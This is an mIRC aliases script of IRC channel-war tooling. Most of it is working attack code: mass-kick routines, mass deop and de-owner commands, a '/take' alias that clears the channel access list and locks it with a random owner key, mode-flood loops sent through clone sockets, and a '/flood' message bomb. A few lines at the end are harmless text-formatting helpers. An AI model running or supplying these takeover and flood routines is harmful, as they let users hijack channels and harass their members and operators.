[aliases]
n0=/mka {
n1=  set %mka $nick(#,0) 
n2=  :bleh
n3=  if (%mka == 0) { goto blah }
n4=  else { goto psshh }
n5=  :psshh
n6=  if ($address($nick(#,%mka),4) == $address($me,4)) { goto erm }
n7=  set %mk1 $nick(#,%mka)
n8=  set %mk2 %mk2 $+ %mk1 $+ $chr(44)
n9=  set %mka $calc(%mka - 1)
n10=  goto bleh
n11=  :erm
n12=  set %mka $calc(%mka - 1)
n13=  goto bleh
n14=  :blah
n15=  .raw kick # %mk2 $1-
n16=  :boo
n17=  unset %mk2 
n18=  unset %mk1
n19=  unset %mka
n20=  unset %tr
n21=}
n22=
n23=/mown {
n24=  set %me $address($me,4)
n25=  set %mka $nick(#,0) 
n26=  :bleh
n27=  if (%mka == 0) { goto blah }
n28=  if (%mka <= 26) && (%mka != 0) { goto psshh }
n29=  else { goto psshh2 }
n30=  :psshh
n31=  if ($nick(#,%mka) == $me) { goto erm }
n32=  if ($nick(#,%mka) == %sock.1) { goto erm }
n33=  if ($nick(#,%mka) == %sock.2) { goto erm }
n34=  if ($nick(#,%mka) !isowner #) { goto erm }
n35=  set %mk1 $nick(#,%mka)
n36=  set %mk2 %mk2 %mk1
n37=  set %mka $calc(%mka - 1)
n38=  goto bleh
n39=  :psshh2
n40=  if ($nick(#,%mka) == $me) { goto erm }
n41=  if ($nick(#,%mka) == %sock.1) { goto erm }
n42=  if ($nick(#,%mka) == %sock.2) { goto erm }
n43=  if ($nick(#,%mka) !isowner #) { goto erm }
n44=  set %mk4 $nick(#,%mka)
n45=  set %mk5 %mk5 %mk4
n46=  set %mka $calc(%mka - 1)
n47=  goto bleh
n48=  :erm
n49=  set %mka $calc(%mka - 1)
n50=  goto bleh
n51=  :blah
n52=  .raw mode # $1 $+ $str($2,26) %mk2 $+ $crlf $+ mode # $1 $+ $str($2,26) %mk5
n53=  unset %mk2 
n54=  unset %mk1
n55=  unset %mka
n56=  unset %mk5
n57=  unset %mk4
n58=}
n59=
n60=key {
n61=  prop # ownerkey LiquidNitrogen[ $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ ]
n62=} 
n63=
n64=keyz {
n65=  prop # hostkey LiquidNitrogen[ $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ ]  
n66=} 
n67=
n68=/fuckme {
n69=  set %mk.totalnicks 0
n70=  set %mk.total $nick(#,0)
n71=  :loop
n72=  if (%mk.totalnicks <= %mk.total) {
n73=    inc %mk.totalnicks
n74=    set %mk.weed %mk.snicks
n75=    set %mk.anick $nick(#,%mk.totalnicks)
n76=    set %mk.snicks %mk.weed %mk.anick
n77=    goto loop
n78=  }
n79=  set %mk.removvar $me $+ $chr(32)
n80=  set %mk.do $REPLACE(%mk.snicks,$CHR(32),$CHR(44))
n81=  set %mk.final $remove(%mk.do,%mk.removvar)
n82=  kick # %mk.final %version
n83=  unset %mk.*
n84=}
n85=
n86=/take {
n87=  access # clear
n88=  mdqo 
n89=  raw -q prop # ownerkey UnKnowN[ $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ $rand(1,9) $+ ]  
n90=} 
n91=
n92=/mdqo {
n93=  set %me $address($me,4)
n94=  set %mka $nick(#,0) 
n95=  set %mdqa $calc($nick(#,0) - $ialchan(%me,#,0)) 
n96=  :you
n97=  if (%mka == 0) { goto blah }
n98=  else { goto psshh }
n99=  :psshh
n100=  if ($address($nick(#,%mka),4) == $address($me,4)) { goto erm }
n101=  if ($nick(#,%mka) !isowner #) { goto erm } 
n102=  set %mk1 $nick(#,%mka)
n103=  set %mk2 %mk2 %mk1
n104=  set %mka $calc(%mka - 1)
n105=  goto you
n106=  :erm
n107=  set %mka $calc(%mka - 1)
n108=  goto you
n109=  :blah
n110=  raw -q mode # - $+ $str(q,%mdqa) %mk2 
n111=  unset %mk2 
n112=  unset %mk1
n113=  unset %mka
n114=  unset %mdqa
n115=}
n116=
n117=hoe { return $address($nick,4) }
n118=
n119=skf {
n120=  unset %skf
n121=  set %skf $1
n122=  set %skfn $2
n123=  /raw -q mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n124=  /raw -q mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n125=  /raw -q mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n126=  /sockwrite -tn %sock.1 mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n127=  /sockwrite -tn %sock.1 mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n128=  /sockwrite -tn %sock.2 mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n129=  /sockwrite -tn %sock.2 mode $1 qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n130=  timerskf 1 10 /skf1 %skf
n131=}
n132=
n133=
n134=skf1 {
n135=  /raw -q mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n136=  /raw -q mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n137=  /raw -q mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n138=  /sockwrite -tn %sock.1 mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n139=  /sockwrite -tn %sock.1 mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n140=  /sockwrite -tn %sock.1 mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n141=  /sockwrite -tn %sock.2 mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n142=  /sockwrite -tn %sock.2 mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n143=  /sockwrite -tn %sock.2 mode %skf qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo $+ qo %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n144=  /raw -q mode %skf -ooooooooooooooooooooo  %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n145=  /sockwrite -tn %sock.1 mode %skf -ooooooooooooooooooooo  %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n146=  /sockwrite -tn %sock.2 mode %skf -ooooooooooooooooooooo  %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn %skfn
n147=}
n148=
n149=/socksploit {
n150=  set %mka $snick(#,0) 
n151=  :bleh
n152=  if (%mka == 0) { goto blah }
n153=  else { goto psshh }
n154=  :psshh
n155=  set %mk1 $snick(#,%mka)
n156=  set %mk2 %mk2 $+ %mk1 $+ $chr(44)
n157=  set %mka $calc(%mka - 1)
n158=  goto bleh
n159=  :erm
n160=  set %mka $calc(%mka - 1)
n161=  goto bleh
n162=  :blah 
n163=  sockwrite -n %sock.1 kick # %mk2 :0 $+ %qreason
n164=  goto boo
n165=  :boo
n166=  unset %mk2 
n167=  unset %mk1
n168=  unset %mka
n169=  sockwrite -n %sock.1 join #
n170=}
n171=
n172=bleh dialog -m bleh bleh
n173=
n174=/flood {
n175=  sockwrite -tn * privmsg $1- :PING###############################11################################################12################################13#################################################9#####################################8##############################################15#########################################################7#######################################################################################################################################################################
n176=}
n177=
n178=talker {    
n179=  set %colour.words $gettok($1,0,32) | set %colour.lenall $len($1) | set %colour.num 1 | unset %colour.temp | unset %colour.final
n180=  :inc
n181=  set %colour.curword $gettok($1-,%colour.num,32)
n182=  set %colour.final %colour.final %color1 $+ $left(%colour.curword,1) $+ %color2 $+ $mid(%colour.curword,2,$calc($len(%colour.curword) - 1))
n183=  if (%colour.num == %colour.words) goto endmenoww
n184=  inc %colour.num
n185=  goto inc
n186=  :endmenoww
n187=  .timer 1 1 unset %colour.* 
n188=  return %colour.final
n189=}
n190=
n191=aecho { 
n192=  %aecho = $comchan($1,0) 
n193=  :begin 
n194=  if (%aecho == 0) goto done 
n195=  echo $comchan($1,%aecho) $2- 
n196=  dec %aecho 
n197=  goto begin 
n198=  :done
n199=  unset %aecho 
n200=}
n201=
n202=atime { 
n203=  set %atime $gettok($time,1,58)
n204=  if (%atime >= 13) { %atime = %atime - 12 | return %atime $+ : $+ $gettok($time,2,58) $+ pm }
n205=  else if (%atime == 12) { return %atime $+ : $+ $gettok($time,2,58) $+ pm }
n206=  else if (%atime == 0) { %atime = %atime + 12 | return %atime $+ : $+ $gettok($time,2,58) $+ am }
n207=  else { return %atime $+ : $+ $gettok($time,2,58) $+ am }
n208=}
n209=
n210=fucktime { return 12[0 $+ $atime $+ 12] $+ 0: $+ }
